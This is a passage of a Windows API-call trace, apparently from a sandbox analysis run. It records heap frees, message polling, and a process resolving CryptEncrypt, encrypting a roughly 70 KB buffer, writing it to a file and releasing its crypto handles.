dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.091] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0215.091] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11490, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11498) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0215.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0215.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.092] CharLowerBuffW (in: lpsz="byte[70808]", cchLength=0xb | out: lpsz="byte[70808]") returned 0xb [0215.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.093] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.093] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.094] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.094] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x11490, dwBufLen=0x11498 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x11498) returned 1 [0215.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.097] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.097] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.097] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.097] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.097] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.097] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.097] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.097] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.097] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.097] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.097] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.097] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.097] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.098] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.098] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.105] WriteFile (in: hFile=0x504, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x11498, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x11498, lpOverlapped=0x0) returned 1 [0215.107] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.107] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.107] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.107] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.107] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.107] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.107] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.107] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.107] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.107] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.107] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.107] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab788, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.108] CryptDestroyKey (hKey=0x9e1cb8) returned 1 [0215.108] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.108] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.108] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.108] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.108] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.108] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.108] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.108] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.108] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.108] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.108] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.109] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.109] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.109] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.109] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.109] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.109] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.109] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.109] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.109] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.109] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.109] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.109] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.109] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.110] CryptReleaseContext (hProv=0xa7be68, dwFlags=0x0) returned 1 [0215.110] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.110] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | 